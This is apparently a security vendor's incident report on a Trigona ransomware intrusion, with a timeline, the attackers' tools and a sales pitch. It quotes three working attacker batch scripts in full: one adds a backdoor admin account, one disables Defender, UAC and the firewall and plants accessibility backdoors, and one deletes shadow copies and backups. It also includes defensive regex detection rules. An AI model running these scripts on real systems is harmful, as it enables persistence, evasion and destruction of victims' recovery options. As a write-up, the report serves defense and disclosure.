Real case: Company victim of Trigona Ransomware in November 2023 (client name and sector omitted for confidentiality)
Key points
| Date/Time (CET) | Event |
|---|---|
| Nov 4 - 11:41 | Initial access using valid credentials to an exposed RDWeb service. Installation of TeamViewer and SplashTop to maintain persistence. |
| Nov 4 - 13:00 | Lateral movement to the internal SQL server using the same local administrator user used for initial access. Creation of new user “sys” with administrator privileges. |
| Nov 4 - 14:30 | Execution of zam.bat: enabling WDigest, activating RDP, disabling Windows Defender, and registry modifications to evade defenses. |
| Nov 5-7 | Reconnaissance with NetScan (SoftPerfect) to discover machines with RDP and SMB enabled. Installation of MeshAgent (MeshCentral) for remote command execution. |
| Nov 8 - 23:09 | Installation of IOBit Unlocker to copy locked files (SQL databases in use). Start of data exfiltration via rclone to pCloud. |
| Nov 9 - 19:44 | Transfer and in-memory execution of encrypted mimikatz (423844210.dat) via SplashTop. Capture of domain administrator credentials thanks to enabled WDigest. |
| Nov 12 - 01:00 | Mass detonation of Trigona ransomware using Domain Admin credentials. RDP and SMB connections to critical servers, file servers, and backups. Encryption of entire infrastructure. |
| Nov 12 - 03:01 | Execution of coba.bat: deletion of Shadow Copies, backups, and disabling of the Windows recovery system. Use of Wise Force Deleter to delete unencrypted SQL databases. |
Gaining persistence after initial access
The attackers began by installing TeamViewer and SplashTop on the compromised machine on November 4, 2023 at 11:41, using the local Administrator account of the exposed system, in order to ensure persistence.
The absence of brute-force attempts and the use of valid credentials suggest that the threat actor may have obtained the local Administrator password of the exposed machine through leaks or purchase from an IAB (Initial Access Broker), especially considering other external access events in the weeks prior to the intrusion.
Lateral movement to the main SQL server
The internal compromise was first identified through a lateral movement from the exposed RD machine to the internal SQL server, using the same local administrator account that had been used for initial access.
After gaining local administrator access on the SQL server, the attackers dropped a file called “newuser.bat”, which created an additional Local Administrator user named “sys” on the SQL machine.
newuser.bat - Creation of new user “sys” with password “t1518061-” (Local Administrator and RDP)
```batch
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "=") Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user sys t1518061- /add
net localgroup %AdmGroup% sys /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "=") Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" sys /add
net accounts /maxpwage:unlimited
```
Defense Evasion Tactics
The new “sys” account was then used to run another batch script that modified the Windows registry to enable WDigest (plaintext credential caching), enabled RDP together with a Windows firewall rule, and disabled Windows Defender. As the script shows, it also sets cmd.exe as the IFEO “Debugger” for the accessibility binaries (HelpPane.exe, utilman.exe, Magnify.exe, sethc.exe), disables LSA protection (RunAsPPL), UAC and RDP Network Level Authentication, and turns off the host firewall on all profiles.
zam.bat (Enables WDigest, Enables RDP, Disables Windows Defender)
```batch
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services /f /v fDenyTSConnections /t REG_DWORD /d 00000000
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services /f /v fAllowUnsolicited /t REG_DWORD /d 00000001
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services /f /v UserAuthentication /t REG_DWORD /d 00000000
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /f /v SecurityLayer /t REG_DWORD /d 00000001
reg add HKLM\SYSTEM\CurrentControlSet\services\WinDefend /v Start /t REG_DWORD /d 4 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v DisableCAD /t REG_DWORD /d 0 /f
netsh advfirewall set allprofiles state off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters /v AllowEncryptionOracle /t REG_DWORD /d 2
```
Reconnaissance and lateral movement tasks
Use of NetScan (nmap alternative)
During the intrusion, the “netscan.exe” tool from SoftPerfect Ltd. was copied and executed at C:\Users\Administrador\Pictures\netscan\netscan.exe on several servers as they were being compromised, to discover other machines on the network with RDP and SMB enabled, as well as database services on other network servers.
Data exfiltration
Enabling reading of locked files via IOBit Unlocker
Four days after executing the “zam.bat” script, on November 8, 2023 at 23:09, the cybercriminals installed the software “IOBit Unlocker” to facilitate copying files and reading locked files, such as the SQL database, which cannot be copied if it is in use by another process.
Use of pCloud and exfiltration via rclone
Using this file unlocking method via IOBit Unlocker, they managed to copy and steal database and SQL server information using the private cloud service www.pcloud.com and the remote file copy program rclone.
The rclone configuration file was encrypted: the key that protects it is derived from a SHA-256 hash of the password chosen by the operator, and neither the password nor its hash is stored in the configuration file.
This type of OPSEC reflects notable experience on the part of the group; a less experienced threat actor might have overlooked such a precaution.
Use of SnipeDrive for file and directory listing
During the exfiltration phase we saw that the threat actor used a program called “sd.exe” (SnipeDrive).
The “sd.exe” program is a self-extracting binary that deploys a tool called “Snap2HTML.exe” along with a batch file designed to run this tool on each disk drive. The functionality of Snap2HTML is interesting for threat actors, as it allows taking a “snapshot” of folder structures on a hard drive and saving them as HTML files.
They used this listing to quickly identify files of interest, plan the data exfiltration, and document the file structure of the victim company.
Escalating from Local Administrator to Domain Admin
Use of mimikatz (packed, in-memory execution)
One day after installing IObit Unlocker, and following the data exfiltration, on November 9, 2023 at 19:44 the file “423844210.dat” was copied via SplashTop. It contained an encrypted version of the mimikatz tool, which was executed in memory to evade the EDR. Because WDigest had been enabled, the ransomware group then obtained the credentials of several domain administrators who had logged in to the SQL server.
Ransomware Detonation via RDP and SMB
On November 12, 2023 at 1:00, using the SQL server as a pivot, they established multiple RDP connections to critical systems using domain administrator credentials, including several file servers and backup servers on which they also copied and executed the Trigona ransomware.
The ransomware also initiated SMB connections to other remote hosts such as NAS devices and the primary and secondary domain controllers, encrypting them as well.
Deletion of Copies and Databases after Detonation
Deletion of Shadow Copies and Disabling Windows Recovery System
After the ransomware execution, on November 12, 2023 at 3:01, the threat actors massively deployed and executed a file called “coba.bat” to delete Shadow Copies and disable the Windows recovery system.
coba.bat
```batch
timeout /t 1 /nobreak
wbadmin delete systemstatebackup -quiet
wbadmin delete backup -quiet
wmic shadowcopy delete
bcdedit /set {default} recoveryenabled no
vssadmin list shadows
timeout /t 1 /nobreak
vssadmin delete shadows /all /quiet
timeout /t 1 /nobreak
net stop "Microsoft Software Shadow Copy Provider"
net stop "Volume Shadow Copy"
net stop "System Restore Service"
```
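As an added defensive example (not code from the report or from Merabytes), the following Python rules flag process-creation command lines that match the actions in newuser.bat, zam.bat and coba.bat above and group the hits into the intrusion stages seen in this case. The rule names, the stage grouping and the sample command lines are constructed for the example; the sample lines are copied from the scripts quoted on this page.

```python
import re
from collections import defaultdict

# Added example (not the report's code): (rule, regex) pairs derived from newuser.bat,
# zam.bat and coba.bat; matched on a lower-cased, whitespace-collapsed command line.
RULES = [
    ("local_user_created",      r"net user \S+ \S+ /add"),
    ("local_admin_added",       r"net localgroup \"?(administrators|administradores|%admgroup%)\"? \S+ /add"),
    ("wdigest_plaintext_creds", r"\\wdigest /v uselogoncredential .*?/d 1\b"),
    ("lsa_ppl_disabled",        r"\\lsa /v runasppl .*?/d 0\b"),
    ("defender_disabled",       r"(services\\windefend /v start .*?/d 4\b|disableantispyware .*?/d 1\b)"),
    ("ifeo_debugger_hijack",    r"image file execution options\\(sethc|utilman|magnify|helppane)\.exe .*?/v debugger"),
    ("rdp_enabled",             r"fdenytsconnections .*?/d 0+\b"),
    ("uac_disabled",            r"/v enablelua .*?/d 0\b"),
    ("firewall_off",            r"netsh advfirewall set allprofiles state off"),
    ("shadow_copies_deleted",   r"(vssadmin delete shadows|wmic shadowcopy delete)"),
    ("backups_deleted",         r"wbadmin delete (backup|systemstatebackup)"),
    ("recovery_disabled",       r"bcdedit /set \{default\} recoveryenabled no"),
]

def classify(cmdline):
    """Return the names of all rules matching one process command line."""
    norm = " ".join(cmdline.split()).lower()
    return [name for name, pattern in RULES if re.search(pattern, norm)]

# Defender's grouping of rules into the stages observed in this intrusion.
STAGES = {
    "persistence":      {"local_user_created", "local_admin_added"},
    "defense_evasion":  {"defender_disabled", "ifeo_debugger_hijack", "uac_disabled", "firewall_off"},
    "credential_prep":  {"wdigest_plaintext_creds", "lsa_ppl_disabled"},
    "inhibit_recovery": {"shadow_copies_deleted", "backups_deleted", "recovery_disabled"},
}

def triage(cmdlines):
    """Map each tripped rule to its command lines and list the stages observed."""
    hits = defaultdict(list)
    for line in cmdlines:
        for name in classify(line):
            hits[name].append(line)
    stages = [stage for stage, rules in STAGES.items() if rules & set(hits)]
    return dict(hits), stages

# Constructed process-creation command lines copied from the scripts quoted above.
SAMPLE = [
    r'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1',
    "net localgroup Administradores sys /add",
    "vssadmin list shadows",  # benign listing from coba.bat, must not match
    "vssadmin delete shadows /all /quiet",
]
```

Feeding real Sysmon Event ID 1 or Windows 4688 command lines through `triage` and alerting when two or more stages appear on one host within a short window captures the sequence this report describes without relying on file hashes.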
Use of Wise Force Deleter to delete SQL databases
After the ransomware detonation, the threat actor also used “WiseDeleter.exe” manually to delete the SQL database, which had not been encrypted by the ransomware since the SQL service was running and prevented the Trigona ransomware from writing to it.
Detection and IOCs (Indicators of Compromise)
IP Addresses
Hashes and related files
VirusTotal URLs
How our Adversary-Aware SOC would have prevented this attack
Our Adversary-Aware SOC is specifically designed to identify and neutralize ransomware tactics like those used by Trigona:
| Merabytes Defense Area | How our SOC would have acted | Result obtained |
|---|---|---|
| Identity protection (Cisco Duo 2FA on devices and accounts) | Immediate blocking of unvalidated RDWeb and RDP access, even with stolen or leaked credentials. | Initial access vector is cut off. |
| Endpoint Protection with anti-ransomware rules | Stopping mass encryption processes, execution of vssadmin delete shadows and coba.bat. | Encryption stops at initial hosts. |
| Continuous Active Directory analysis | Alerts on creation of privileged accounts (“sys”) and suspicious registry modifications (WDigest enabled). | Rapid containment before lateral movement. |
| Backdoor hunting (TeamViewer, SplashTop, MeshAgent) | Identification and removal of unauthorized remote access tools. | Removal of attacker persistence. |
| Reconnaissance tool detection | Alerts on execution of NetScan, IOBit Unlocker, and exfiltration tools (rclone). | Blocking of reconnaissance and exfiltration. |
| Anomalous behavior monitoring | Detection of outbound connections to pCloud, in-memory execution of encrypted mimikatz. | Prevention of credential theft and exfiltration. |
| Continuous vulnerability analysis | Prior detection of exposed RDWeb services without 2FA, with early warning and hardening recommendation. | Attack prevented before exploitation. |
Thanks to the adversary-focused mindset, our SOC understands the TTPs (Tactics, Techniques, and Procedures) of ransomware groups like Trigona. We actively monitor known IOCs, ransomware behavior patterns, and evasion techniques to stop attacks in their early stages, before they can cause significant damage.
Lessons learned
Conclusion
The attack was successful because there was no adaptive defense or continuous monitoring. With Merabytes, the story would have ended differently:
If you are interested in accessing other private reports or specific rules for EDR/XDR, visit merabytes.com and request access to our advanced endpoint protection services + continuous vulnerability analysis.